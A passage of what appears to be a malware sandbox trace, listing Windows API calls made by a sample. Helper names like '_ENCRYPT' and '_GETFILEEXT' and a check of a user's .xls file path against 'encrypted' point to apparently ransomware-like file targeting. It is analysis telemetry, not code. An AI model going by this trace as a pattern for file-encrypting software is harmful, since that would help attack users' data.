hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0034.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0034.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0034.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0034.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0034.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0034.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.455] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.455] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.455] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0034.455] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.455] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.455] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0034.455] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x151f, lpOverlapped=0x0) returned 1 [0034.456] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0034.456] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x151f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.456] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.456] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.456] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.456] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.456] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.456] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0034.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0034.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.456] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0034.456] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0034.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.457] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.457] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889ad8 [0034.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889ad8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0034.457] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\2ku7the4lqt.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0034.457] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.457] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0034.457] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.458] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.458] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0034.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8891d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0034.458] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.458] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0034.458] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0034.458] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0034.458] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0034.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.459] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0034.459] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.459] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0034.459] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.459] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.460] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76580980, ftCreationTime.dwHighDateTime=0x1d5baac, ftLastAccessTime.dwLowDateTime=0x9d824440, ftLastAccessTime.dwHighDateTime=0x1d5b5f6, ftLastWriteTime.dwLowDateTime=0x9d824440, ftLastWriteTime.dwHighDateTime=0x1d5b5f6, nFileSizeHigh=0x0, nFileSizeLow=0x12571, dwReserved0=0x0, dwReserved1=0x777648, cFileName="2KU7thE4LQT.xls", cAlternateFileName="2KU7TH~1.XLS")) returned 0x7c20c0 [0034.460] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.460] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.461] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76580980, ftCreationTime.dwHighDateTime=0x1d5baac, ftLastAccessTime.dwLowDateTime=0x9d824440, ftLastAccessTime.dwHighDateTime=0x1d5b5f6, ftLastWriteTime.dwLowDateTime=0x9d824440, ftLastWriteTime.dwHighDateTime=0x1d5b5f6, nFileSizeHigh=0x0, nFileSizeLow=0x12571, dwReserved0=0x0, dwReserved1=0x777648, cFileName="2KU7thE4LQT.xls", cAlternateFileName="2KU7TH~1.XLS")) returned 0x7c20c0 [0034.461] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0034.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.461] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS 